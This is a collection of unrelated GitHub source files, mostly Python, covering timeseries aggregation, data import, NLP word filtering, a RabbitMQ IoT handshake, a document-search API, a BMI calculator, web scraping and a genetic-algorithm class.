indicator_set\n else:\n selected_indicator_set = self._indicator_set\n\n if len(selected_df) == 0:\n LOG.log_with_warning(\n 'The selected filters removed all data, the resulting TimeseriesDataset is empty.')\n LOG.debug('Filtered Dataset contains %s rows.', len(selected_df))\n\n return TimeseriesDataset(selected_df, selected_indicator_set, selected_equi_set,\n start_time, end_time, self.is_normalized)\n\n def aggregate(self,\n aggregation_interval: Union[str, pd.Timedelta],\n aggregation_functions: Union[Iterable[Union[str, Callable]], str, Callable] = 'mean')\\\n -> TimeseriesDataset:\n \"\"\"\n Aggregate the TimeseriesDataset to a fixed interval, returning a new TimeseriesDataset.\n\n This operation will change the unique feature IDs, as the new IDs need to encode the additional information on\n the aggregation function. Accordingly there will also be an additional column index level for the\n aggregation function on the DataFrame returned by :meth:`sailor.timeseries.wrappers.TimeseriesDataset.as_df`\n when using ``speaking_names=True``.\n Note that the resulting timeseries is not equidistant if gaps larger than the aggregation interval are\n present in the original timeseries.\n\n Parameters\n ----------\n aggregation_interval\n String specifying the aggregation interval, e.g. '1h' or '30min'. Follows the same rules as the ``freq``\n parameter in a ``pandas.Grouper`` object.\n aggregation_functions\n Aggregation function or iterable of aggregation functions to use.\n Each aggregation_function can be a string (e.g. 'mean', 'min' etc) or a function (e.g. np.max etc).\n \"\"\"\n aggregation_interval = pd.Timedelta(aggregation_interval)\n if isinstance(aggregation_functions, str) or isinstance(aggregation_functions, Callable):\n aggregation_functions = (aggregation_functions, )\n\n new_indicators = []\n aggregation_definition = {}\n for indicator in self._indicator_set:\n for aggregation_function in aggregation_functions:\n new_indicator = ac_indicators.AggregatedIndicator(indicator.raw, str(aggregation_function))\n new_indicators.append(new_indicator)\n aggregation_definition[new_indicator._unique_id] = (indicator._unique_id, aggregation_function)\n new_indicator_set = ac_indicators.AggregatedIndicatorSet(new_indicators)\n\n grouper = [*self.get_key_columns(include_model=False),\n pd.Grouper(key=self.get_time_column(), closed='left', freq=aggregation_interval)]\n df = self._df.groupby(grouper).agg(**aggregation_definition)\n\n return TimeseriesDataset(df.reset_index(), new_indicator_set, self._equipment_set,\n self.nominal_data_start, self.nominal_data_end, self.is_normalized)\n\n def interpolate(self, interval: Union[str, pd.Timedelta], method='pad', **kwargs) -> TimeseriesDataset:\n \"\"\"\n Interpolate the TimeseriesDataset to a fixed interval, returning a new TimeseriesDataset.\n\n Additional arguments for the interpolation function can be passed and are forwarded to the pandas `interpolate`\n function. The resulting TimeseriesDataset will always be equidistant with timestamps between\n `self.nominal_data_start` and `self.nominal_data_end`. However, values at these timestamps may be NA depending\n on the interpolation parameters.\n By default values will be forward-filled, with no limit to the number of interpolated points between two\n given values, and no extrapolation before the first known point. The following keyword arguments can be used to\n achieve some common behaviour:\n - method='slinear' will use linear interpolation between any two known points\n - method='index' will use a pandas interpolation method instead of the scipy-based method, which\n automatically forward-fills the last known value to the end of the time-series\n - fill_value='extrapolate' will extrapolate beyond the last known value (but not backwards before the first\n known value, only applicable to scipy-based interpolation methods.)\n - limit=`N` will limit the number of interpolated points between known points to N.\n Further details on this behaviour can be found in\n https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.interpolate.html\n \"\"\"\n def _fill_group(grp):\n target_times = pd.date_range(self.nominal_data_start, self.nominal_data_end, freq=interval,\n inclusive='left').round(interval)\n\n new_index = pd.DatetimeIndex(target_times.union(grp.timestamp))\n with_all_timestamps = grp.set_index(self.get_time_column()).reindex(new_index).sort_index()\n\n if len(grp) <= kwargs.get('order', 1):\n group_identifier = [grp[key].iloc[0] for key in self.get_key_columns()]\n LOG.warning(f'Not enough datapoints for interpolation in group {group_identifier}!')\n return with_all_timestamps.loc[target_times]\n tmp = with_all_timestamps.interpolate(method=method, **kwargs).loc[target_times]\n tmp.index = tmp.index.set_names('timestamp') # loc loses index name...\n return tmp\n\n interval = pd.Timedelta(interval)\n if interval > (self.nominal_data_end - self.nominal_data_start):\n raise RuntimeError('Can not interpolate to an interval larger than the data range.')\n\n df = (\n self._df\n .groupby(self.get_key_columns(include_model=False))\n .apply(_fill_group)\n .drop(columns=self.get_key_columns(include_model=False))\n .reset_index()\n )\n return TimeseriesDataset(df, self._indicator_set, self._equipment_set,\n self.nominal_data_start, self.nominal_data_end, self.is_normalized)\n","repo_name":"SAP/project-sailor","sub_path":"sailor/sap_iot/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":24053,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"14299107859","text":"import sys, pickle\r\n\r\ndef findPWMName(pwm):\r\n f = open(\"../../Doc/Vertebrate PWM/full_matrix_list.txt\", \"r\")\r\n s = f.readline()\r\n while s != \"\":\r\n stringList = s.split(\";\")[0].split()\r\n if pwm == stringList[0]:\r\n f.close()\r\n return stringList[2]\r\n s = f.readline() \r\n f.close()\r\n return \"noName\"\r\n\r\ndef findPWMFam(pwm): \r\n f = open(\"../../Doc/Vertebrate PWM/full_matrix_list.txt\", \"r\")\r\n s = f.readline()\r\n while s != \"\":\r\n stringList = s.split(\";\")[0].split() \r\n if pwm == stringList[0]:\r\n f.close()\r\n classString = \"\"\r\n if len(stringList) > 4:\r\n classString = stringList[3].replace(\",\",\"\") + \"_\" + stringList[4]\r\n else: classString = stringList[3] \r\n return classString\r\n s = f.readline() \r\n f.close()\r\n return \"noFam\"\r\n\r\ndef average(lineSplits):\r\n acc = float(0)\r\n for i in range(len(lineSplits)):\r\n acc += float(lineSplits[i][2])\r\n \r\n return str(acc/float(len(lineSplits)))\r\n\r\ndef accLLs(lineSplits):\r\n ret = \"\"\r\n for i in range(len(lineSplits)):\r\n ret = ret + lineSplits[i][2] + \",\"\r\n return ret\r\n\r\ndef main(args):\r\n gaps = [1, 2, 3, 4, 5, 6, 7]\r\n pwmFile = open(\"../../Doc/Vertebrate PWM/PWMlist.txt\", \"r\")\r\n pwms = pickle.load(pwmFile)\r\n pwmFile.close()\r\n\r\n for gap in gaps: \r\n excelFile = open(\"../../Results/Transitive/\" + str(gap+1) + \" Edges.csv\", \"w\")\r\n for i in range(len(pwms)):\r\n flag = False\r\n try:\r\n singleFile = open(\"../../Results/Real/Raw Data/Gap 0/\" + pwms[i] + \"(p \" + str(-9) + \").gff.ll\", \"r\")\r\n edgeFile = open(\"../../Results/Real/Raw Data/Gap \" + str(gap) + \"/\" + pwms[i] + \"(p \"+ str(-9)+ \").gff.ll\", \"r\")\r\n flag = True\r\n except: pass #print \"not here\", \"../../Results/Real/Raw Data/Gap \" + str(gap) + \"/\" + pwms[i]+ \"(p \"+ str(9)+ \").gff.ll\"\r\n if flag == True:\r\n LLFiles = []\r\n for q in range(gap+1):\r\n LLFiles.append(singleFile.readline()) \r\n edge = edgeFile.readline()\r\n while LLFiles[gap].split()[0] != \"Hit\": \r\n lineSplits = []\r\n for q in range(gap+1):\r\n lineSplits.append(LLFiles[q].split())\r\n \r\n excelFile.write(findPWMFam(pwms[i]) + \",\" + findPWMName(pwms[i]) + \",\" + pwms[i] + \",\" +\\\r\n lineSplits[0][0].replace(\"(\",\"\").replace(\",\",\"\") + \",\" + lineSplits[gap][1].replace(\")\",\"\") + \",\" + edge.split()[2] + \\\r\n \",\" + accLLs(lineSplits) + average(lineSplits) + \"\\n\") \r\n for q in range(gap):\r\n LLFiles[q] = LLFiles[q+1]\r\n LLFiles[gap] = singleFile.readline()\r\n edge = edgeFile.readline()\r\n singleFile.close()\r\n edgeFile.close()\r\n excelFile.close()\r\n sys.exit(0)\r\n# -----------------------------------------------------------------------------\r\n# The following code executes upon command-line invocation\r\nif __name__ == \"__main__\": main(sys.argv)\r\n# -----------------------------------------------------------------------------\r\n# EOF\r\n","repo_name":"samesense/compmut","sub_path":"Method1/Code/Analysis/makeTransExcel.py","file_name":"makeTransExcel.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27254153329","text":"\"\"\"\nA management command to import the sample DPU data from a CSV file.\n\"\"\"\nfrom csv import DictReader\n\nfrom dateutil.parser import isoparse\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\nfrom django.utils.decorators import method_decorator\n\nfrom dpu.models import DPU, Doorway, Space\nfrom dpu.utils import record_dpu_event\n\n\n@method_decorator(transaction.atomic, name=\"handle\")\nclass Command(BaseCommand):\n \"\"\"Implementation of the sample data import process.\"\"\"\n\n help = \"Imports the sample DPU data.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"file\", help=\"file with the sample DPU data in CSV format\")\n\n def handle(self, *args, **options):\n \"\"\"Handler for the command.\"\"\"\n # Perform initial database setup, if base objects are not already added.\n space_a, _ = Space.objects.get_or_create(name=\"A\")\n space_b, _ = Space.objects.get_or_create(name=\"B\")\n doorway_x, _ = Doorway.objects.get_or_create(name=\"X\")\n doorway_z, _ = Doorway.objects.get_or_create(name=\"Z\")\n DPU.objects.get_or_create(dpu_id=283, doorway=doorway_x, entry_space=space_a)\n DPU.objects.get_or_create(\n dpu_id=423, doorway=doorway_z, entry_space=space_a, exit_space=space_b\n )\n with open(options[\"file\"], \"r\") as source:\n self.process_file(source)\n\n def process_file(self, source):\n \"\"\"Actually read the data from the file and import it.\"\"\"\n reader = DictReader(source)\n for row in reader:\n record_dpu_event(\n dpu_id=int(row[\"dpu_id\"]),\n timestamp=isoparse(row[\"timestamp\"]),\n direction=int(row[\"direction\"]),\n )\n","repo_name":"rmecham/density","sub_path":"source/dpu/management/commands/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37775149513","text":"#Filtering a text: This program computes the vocabulary of a text, then removes all items\r\n#that occur in an existing wordlist, leaving just the uncommon or misspelled words\r\nimport nltk\r\ndef unusual_words(text):\r\n text_vocab = set(w.lower() for w in text if w.isalpha())\r\n english_vocab = set(w.lower() for w in nltk.corpus.words.words())\r\n unusual = text_vocab.difference(english_vocab)\r\n print(sorted(unusual))\r\n\r\nunusual_words(nltk.corpus.gutenberg.words('austen-sense.txt'))\r\n","repo_name":"KushalVijay/Natural-Language-Processing-Zero-to-Hero","sub_path":"Filtering text.py","file_name":"Filtering text.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"37684318891","text":"# Parent class\n\nclass Student:\n def __init__(self, name, ID, age, mood, grade):\n self.name = name\n self.ID = ID\n self.age = age\n self.mood = mood\n self.grade = grade\n\n def say_hi(self):\n print(\"Name:\", self.name,\n \"\\nID:\", self.ID,\n \"\\nAge:\", self.age,\n \"\\nMood:\", self.mood,\n \"\\nGrade:\", self.grade)\n\n\n\n\n\n\n\n\n\n","repo_name":"naistangz/OOP","sub_path":"student_data/student_data.py","file_name":"student_data.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"11289511740","text":"import pika\r\nfrom Crypto.Hash import MD5\r\nBROKER = '192.168.1.4'\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host=BROKER))\r\nchannel = connection.channel()\r\nchannel.exchange_declare(exchange='serverHand',exchange_type='fanout')\r\nchannel.exchange_declare(exchange='clientHand',exchange_type='fanout')\r\nresult = channel.queue_declare(exclusive=True)\r\nqueue_name = result.method.queue\r\nchannel.queue_bind(exchange='serverHand',queue=queue_name)\r\n\r\n\r\ndef WF_transmit(packet):\r\n\tchannel.basic_publish(exchange='serverHand',\r\n routing_key='',\r\n body=packet)\r\n\r\ndef sendpacket():\r\n\theader = b'\\x01\\x00\\x07\\x2c\\x04\\x12\\xff'\r\n\tsecret = 'HkdW54vs4FrSUS2Y'\r\n\ttemp = header + secret.encode()\r\n\tht = MD5.new()\r\n\tht.update(temp)\r\n\tfinal = ht.hexdigest()\r\n\tpacket = header + bytes.fromhex(final)\r\n\treturn packet\r\n\r\nWF_transmit(sendpacket())","repo_name":"CineCaldejon/ISSA-IoT","sub_path":"Client/testers/mq_overlayService.py","file_name":"mq_overlayService.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38790285577","text":"from math import inf\nimport numpy\n\ndef readInput():\n \n global leftmost\n global rightmost\n global minX\n global maxX \n\n leftmost = -1\n rightmost = -1\n minX = inf\n maxX = -inf\n\n with open(\"2.in\") as f:\n n = int(f.readline().strip())\n\n puncte = []\n for i in range(n):\n x, y = f.readline().strip().split()\n\n x = int(x)\n y = int(y) \n\n if x > maxX:\n rightmost = i\n maxX = x\n if x < minX:\n leftmost = i\n minX = x\n\n puncte.append((x,y))\n return puncte, n\n\ndef viraj(P, Q, R):\n mat = numpy.array([[1, 1, 1],\n [P[0],Q[0],R[0]],\n [P[1],Q[1],R[1]]])\n\n rez = numpy.linalg.det(mat)\n\n if rez == 0:\n return 0\n elif rez > 0:\n return 1\n else:\n return 2\n\n\ndef main():\n\n puncte, n = readInput()\n\n print(puncte)\n\n i = leftmost\n\n P = puncte[i]\n Q = puncte[(i+1) % n]\n\n hull = []\n\n hull.append(P)\n\n while True:\n hull.append(Q)\n\n R = puncte[(i + 2) % n]\n\n if i + 2 <= rightmost: \n rez = viraj(P, Q, R)\n\n if rez == 0 or rez == 2:\n hull.pop(-1)\n hull.append(R)\n elif rez == 1:\n hull.append(R)\n\n elif i + 2 > rightmost:\n rez = viraj(P, Q, R)\n\n if rez == 0 or rez == 1:\n hull.pop(-1)\n hull.append(R)\n elif rez == 2:\n hull.append(R)\n\n i = (i + 1 ) % n\n P = Q\n Q = R\n\n if i == leftmost:\n print(hull)\n return\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mihai-radulescu/UniversitySecondYear","sub_path":"AA/Part2/Lab5/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10423584601","text":"import logging\r\nimport os\r\nimport json\r\nfrom typing import Union, Optional\r\n\r\nimport azure.functions as func\r\n\r\nfrom pydantic import BaseModel\r\nfrom fastapi import FastAPI, File, UploadFile\r\nfrom sqlalchemy.orm import Session\r\nfrom sqlalchemy import text\r\nimport sqlalchemy as sa\r\n\r\nfrom doc_utils.orm import Document, Embedding\r\nfrom doc_utils.db import get_engine\r\nfrom doc_utils.llm import get_embedding, Chat, DocumentChat\r\n\r\n\r\napp = FastAPI()\r\n\r\nblob_connection_str = os.getenv(\"BLOB_CONNECTION_STR\")\r\n\r\n\r\nclass DBDocument(BaseModel):\r\n id: int\r\n blob_path: str\r\n full_text: Optional[str]\r\n file_hash: str\r\n title: str\r\n authors: list[str]\r\n keywords: list[str]\r\n page_summaries: Optional[str]\r\n summary: str\r\n\r\n\r\ndef document_mapper(doc: Document):\r\n doc = doc.__dict__.copy()\r\n del doc[\"_sa_instance_state\"]\r\n del doc[\"page_summaries\"]\r\n del doc[\"full_text\"]\r\n return doc\r\n\r\n\r\n@app.get(\"/search\")\r\nasync def embedding_search(\r\n content: str, skip: int = 0, limit: int = 10\r\n) -> list[DBDocument]:\r\n print(\"searching\")\r\n embedding = json.dumps(get_embedding(content))\r\n engine = get_engine()\r\n with Session(engine) as session:\r\n cte = (\r\n sa.select(\r\n Embedding.doc_id,\r\n text(f\"MIN(embedding <=> '{embedding}') AS vector_distance\"),\r\n )\r\n .group_by(Embedding.doc_id)\r\n .order_by(text(\"vector_distance\"))\r\n .offset(skip)\r\n .limit(limit)\r\n .cte(name=\"distances\")\r\n )\r\n results = (\r\n session.query(Document)\r\n .join(cte, cte.c.doc_id == Document.id)\r\n .order_by(text(\"distances.vector_distance\"))\r\n .all()\r\n )\r\n docs = [document_mapper(doc) for doc in results]\r\n return docs\r\n\r\n\r\n@app.post(\"/qna\")\r\nasync def submit_chat(chat: Chat) -> Chat:\r\n engine = get_engine()\r\n with Session(engine) as session:\r\n doc = session.query(Document).filter(Document.id == chat.doc_id).first()\r\n chat.document = doc.summary\r\n\r\n chat_gen = DocumentChat(chat)\r\n next_chat = chat_gen.predict()\r\n\r\n return next_chat\r\n\r\n\r\n@app.post(\"/newdocument\")\r\nasync def upload_document(file: UploadFile = File()):\r\n return {\"file_size\": file.filename}\r\n\r\n\r\n@app.post(\"/qna\")\r\nasync def document_chat():\r\n return\r\n\r\n\r\nasync def main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:\r\n \"\"\"Each request is redirected to the ASGI handler.\"\"\"\r\n return await func.AsgiMiddleware(app).handle_async(req, context)\r\n","repo_name":"bwilliams2/AzureOpenAIDocSearch","sub_path":"api/backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71209313126","text":"import qt\n\n\nclass DragAndDropEventFilter(qt.QWidget):\n def __init__(self, target, callback, parent=None):\n super(DragAndDropEventFilter, self).__init__(parent)\n self.target = target\n self.callback = callback\n\n def eventFilter(self, obj: qt.QObject, event: qt.QEvent):\n if not self.callback or obj != self.target or event.type() != qt.QEvent.Drop:\n return False\n\n event.accept()\n for url in event.mimeData().urls():\n if self.callback:\n self.callback(url.path()[1:])\n return True\n","repo_name":"KitwareMedical/SlicerLiteExtension","sub_path":"SlicerLite/SlicerLiteLib/EventFilters.py","file_name":"EventFilters.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73102769764","text":"import asyncio\nimport traceback\nfrom quart import jsonify, Quart, request\nfrom wiki_search import search_results\nfrom wikipedia.exceptions import PageError\n\napp = Quart(__name__)\n\n@app.route(\"/\", methods=[\"GET\"])\nasync def wiki_search():\n host = request.host\n if host:\n subdomain = host.split(\".\")[0] \n error_msg = \"\"\n status = 200\n try:\n results = search_results(subdomain)\n except PageError:\n error_msg = subdomain + \" did not return any wikipedia search results.\"\n status = 404\n except:\n error_msg = traceback.format_exc()\n status = 500\n if not error_msg:\n return jsonify({\"links\": results}), status\n else:\n return jsonify({\"error\": error_msg}), status\n\napp.run(host=\"localhost\")\n","repo_name":"jamespeacock/wiki-search","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25545120827","text":"# Software Testing and Quality Assurance - Assignment 3\n# Name: Karan Singh\n# NetID: kds662\n# Purpose: new changes\n\ndef BMI_calc(weight_lb, feet, inches):\n\n weight_kg = convert_lb_to_kg(weight_lb)\n height_m = convert_feet_inch_to_m(feet, inches)\n BMI = (weight_kg / (height_m * height_m))\n\n return round(BMI, 1)\n\ndef BMI_calc_category(BMI):\n # [0, 18.5)\n if (BMI >= 0) and (BMI < 18.5):\n BMI_category = \"Underweight\"\n # [18.5, 24.9]\n elif (BMI >= 18.5) and (BMI <= 24.9):\n BMI_category = \"Normal\"\n # [25, 29.9]\n elif (BMI >= 25) and (BMI <= 29.9):\n BMI_category = \"Overweight\"\n # [30, infinity)\n elif BMI >= 30:\n BMI_category = \"Obese\"\n else:\n BMI_category = \"Error\"\n\n return BMI_category\n\ndef convert_lb_to_kg(weight_lb):\n weight_kg = weight_lb * 0.45\n return weight_kg\n\ndef convert_feet_inch_to_m(feet, inches):\n total_inches = (feet * 12) + inches\n height_m = total_inches * 0.025\n return height_m\n\ndef web_BMI_calc(weight_lb, height_ft, height_in):\n weight = int(weight_lb)\n feet = int(height_ft)\n inches = int(height_in)\n BMI = BMI_calc(weight, feet, inches)\n BMI_category = BMI_calc_category(BMI)\n return BMI, BMI_category\n\ndef main():\n print(\"Welcome to our BMI Calculator\\n\")\n while(1):\n weight_lb = int(input(\"Please enter your weight (in pounds): \"))\n print(\"Please enter your height -\")\n feet = int(input(\"(in feet): \"))\n inches = int(input(\"(inches): \"))\n BMI = BMI_calc(weight_lb, feet, inches)\n BMI_category = BMI_calc_category(BMI)\n print(\"Your BMI is: \" + str(round(BMI, 2)))\n print(\"Your BMI category is: \" + BMI_category)\n continue_loop = input(\"\\nWould you like to continue (Y): \")\n if continue_loop != \"Y\":\n print(\"Thank you.\")\n break\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KaranSinghmods/SoftwareTestingQA_Assignment3","sub_path":"BMI_calc.py","file_name":"BMI_calc.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73888558564","text":"# Define an object class that has different attributes - predicted pierceability, actual pierceability, material class, predicted grasp-ability, actual grasp-ability.\n# Further specifies the object position and name\n\nclass MG_object:\n def __init__(self, obj_name, obj_position):\n # Initialize object with name and position\n self.obj_name = obj_name\n self.obj_position = obj_position\n\n # Object attributes\n self.pierce_predict = None\n self.pierce_actual = None\n self.material_class = None\n self.grasp_predict = None\n self.grasp_actual = None\n\n # Permissible values \n self.pierce_values = [None, 1, 0]\n #self.material_values = ['plastic', 'fabric', 'paper', 'wood', 'metal', 'foam']\n self.material_values = ['plastic', 'wood', 'metal', 'foam', 'paper']\n\n def set_attribute(self, attribute, value):\n if attribute == 'pierce_predict':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to pierce_predict attribute')\n else:\n self.pierce_predict = value \n elif attribute == 'pierce_actual':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to pierce_actual attribute')\n else:\n self.pierce_actual = value\n elif attribute == 'grasp_predict':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to grasp_predict attribute')\n else:\n self.grasp_predict = value\n elif attribute == 'grasp_actual':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to grasp_actual attribute')\n else:\n self.grasp_actual = value\n elif attribute == 'material_class':\n if value not in range(len(self.material_values)):\n raise AttributeError('Incorrect value specified to material_class attribute')\n else:\n self.material_class = self.material_values[value]\n else:\n raise AttributeError('Incorrect attribute specified for instance of class MG_object')\n\n def set_pose(self, position):\n self.obj_position = position\n\n class AttributeError(Exception):\n pass\n\n","repo_name":"lnairGT/Robogyver-Tool-Macgyvering","sub_path":"auxiliary/object_class.py","file_name":"object_class.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"29948419489","text":"def to_fixed(v):\n v = str(v)\n (si, sf) = v.split('.')\n d = int(si)\n f = float('0.' + sf)\n k = len(sf)\n mask = (10 ** k)\n\n r = 0\n c = 0.0\n for i in range(64):\n f *= 2\n if f > 1.0:\n c += (1 / (2 ** (i + 1)))\n r |= (1 << (63 - i))\n f -= 1.0\n\n r += (d << 64)\n b = r.to_bytes(16, byteorder='big')\n return int(r)\n\n\ndef from_fixed(v):\n if len(v) > 2:\n if v[:2] == '0x':\n v = v[2:]\n if len(v) % 2 != 0:\n v = '0' + v\n if len(v) < 16:\n raise ValueError('need at least 64 bit hex')\n\n b = bytes.fromhex(v)\n w = int.from_bytes(b, byteorder='big', signed=True)\n d = w & 0xffffffffffffffff\n\n r = 0.0\n k = 1 << 63\n for i in range(64):\n if k & d > 0:\n r += (1 / (1 << (i + 1)))\n k >>= 1\n\n return float(\"{}.{}\".format((w >> 64), \"{:.64f}\".format(r)[2:]))\n","repo_name":"nolash/python-dexif","sub_path":"dexif/dexif.py","file_name":"dexif.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20292602620","text":"from utils import register_sorter\n\n\n@register_sorter\ndef selection_sort(lst):\n for i in range(len(lst)):\n min_idx = i\n for j in range(i + 1, len(lst)):\n if lst[min_idx] > lst[j]:\n min_idx = j\n lst[i], lst[min_idx] = lst[min_idx], lst[i]\n return lst\n\n\nif __name__ == '__main__':\n from utils import check_if_sorted\n srt = selection_sort([7, 8, 5, 2, 2, 3, 1])\n print(srt)\n print(check_if_sorted(srt))\n","repo_name":"nazariinyzhnyk/sorting-algs","sub_path":"sorters/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72406872805","text":"import requests\nimport json\n\n\"\"\"\n动态加载数据\n首页中对应的企业信息数据是通过ajax动态请求到的\n\"\"\"\n\"\"\"\nhttp://scxk.nmpa.gov.cn:81/xk/itownet/portal/dzpz.jsp?id=()\n通过对详情页url的观察,发现url域名都是一样的,只有携带的参数(id)不一样\nid值可以从首页对应的ajax请求到的json串中获取\n域名和id值拼接出一个完整的企业对应的详情页的url\n\"\"\"\n\"\"\"\n详情页的企业详情数据也是动态加载出来的\nhttp://scxk.nmpa.gov.cn:81/xk/itownet/portalAction.do?method=getXkzsById\n所有post请求的url都是一样的,只有参数id值是不同的\n如果我们可以批量获取多家企业的id后,就可以将id和url形成一个完整的详情页对应详情数据的ajax请求的url\n\"\"\"\n\nheaders = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"\n}\n# 批量获取不同企业的id值\nurl = \"http://scxk.nmpa.gov.cn:81/xk/itownet/portalAction.do?method=getXkzsList\"\nid_list = [] # 存储企业的id\nall_data_list = [] # 存储所有的企业详情数据\n# 参数的封装\nfor page in range(1, 6):\n page = str(page)\n data = {\n 'on': 'true',\n 'page': page, # 爬取页数\n 'pageSize': '15',\n 'productName': '',\n 'conditionType': '1',\n 'applyname': '',\n 'applysn': ''\n }\n # 构建企业id列表\n json_ids = requests.post(url=url, headers=headers, data=data).json() # 返回一个字典,字典中list是以字典为元素的列表,每个字典代表一家企业\n for dic in json_ids['list']:\n # 遍历列表中字典,将每个字典中企业id加入到列表中\n id_list.append(dic['ID'])\n\n# 获取企业详情数据\npost_url = 'http://scxk.nmpa.gov.cn:81/xk/itownet/portalAction.do?method=getXkzsById'\nfor id in id_list:\n # 将每个id列表中的id作为参数发起ajax请求\n post_data = {\n 'id': id\n }\n detail_json = requests.post(url=post_url, headers=headers, data=post_data).json()\n all_data_list.append(detail_json)\n\n# 持久化存储\nwith open(\"allData.json\", \"w\", encoding=\"utf-8\") as fp:\n json.dump(all_data_list, fp=fp, ensure_ascii=False, indent=True) # 利用indent自动换行\nprint(\"over!!\")\n","repo_name":"xhj2501/Crawler_train","sub_path":"requests模块应用/requests_5(药监总局).py","file_name":"requests_5(药监总局).py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9438689433","text":"#!/usr/bin/env python\n\n\"\"\"\n@package ion.agents.platform.cgsn.cgsn_client_factory\n@file ion/agents/platform/cgsn/cgsn_client_factory.py\n@author Carlos Rueda\n@brief Cgsn Client factory.\n\"\"\"\n\n__author__ = 'Carlos Rueda'\n\n\n\nfrom pyon.public import log\nimport logging\n\nfrom ion.agents.platform.cgsn.cgsn_client import CGSNClient\nimport os\nimport yaml\n\n_URI_ALIASES_FILENAME = 'ion/agents/platform/cgsn/cgsn_uri_aliases.yml'\n\n\nclass CGSNClientFactory(object):\n \"\"\"\n Provides a CGSNClient implementation.\n \"\"\"\n\n _uri_aliases = None\n\n @classmethod\n def _load_uri_aliases(cls):\n try:\n cls._uri_aliases = yaml.load(file(_URI_ALIASES_FILENAME))\n if log.isEnabledFor(logging.TRACE):\n log.trace(\"Loaded CGSN URI aliases = %s\" % cls._uri_aliases)\n except Exception as e:\n log.warn(\"Cannot loaded %s: %s\" % (_URI_ALIASES_FILENAME, e))\n cls._uri_aliases = {}\n\n @classmethod\n def create_instance(cls, uri=None):\n \"\"\"\n Creates an CGSNClient instance.\n\n @param uri URI to connect to the CGSN Services endpoint.\n \"\"\"\n\n if cls._uri_aliases is None:\n cls._load_uri_aliases()\n\n uri = uri or os.getenv('CGSN', 'localsimulator')\n\n # try alias resolution and then create CGSNClient instance:\n uri = cls._uri_aliases.get(uri, uri)\n host, port = tuple(uri.split(':'))\n address = (host, int(port))\n instance = CGSNClient(address)\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Created CGSNClient for endpoint at: %s:%i\" % address)\n\n return instance\n","repo_name":"ooici/coi-services","sub_path":"ion/agents/platform/cgsn/cgsn_client_factory.py","file_name":"cgsn_client_factory.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"39240715315","text":"\"\"\"\ngenetic_algorithm.py: the base genetic_algorithm class.\n\n\"\"\"\n\nimport numpy as np\nimport multiprocessing as mp\nimport logging\nimport random\nimport os\n\nif __package__ is '':\n from genom_struct import GenomStruct\nelse:\n from .genom_struct import GenomStruct\n\n\n__author__ = \"Mostafa Rafaie\"\n__license__ = \"APLv2\"\n\n\nclass GeneticAlgorithm:\n LOGGER_HANDLER_NAME = 'GA_LOG_HANDLER'\n\n # Cross Over Types\n SINGLE_POINT_CROSSOVER = 0\n TWO_POINT_CROSSOVER = 1\n CUT_SLICE_CROSSOVER = 2\n UNIFORM_CROSSOVER = 3\n\n TOURNAMENT_SIZE = 3\n\n def __init__(self, path, log_level=None):\n self.path = path\n self.gs = GenomStruct(path)\n self.logger = logging.getLogger(GeneticAlgorithm.LOGGER_HANDLER_NAME)\n self.log_level = log_level\n if log_level is not None:\n self.logger.setLevel(log_level)\n\n self.CROSSOVER_FUNCTIONS = 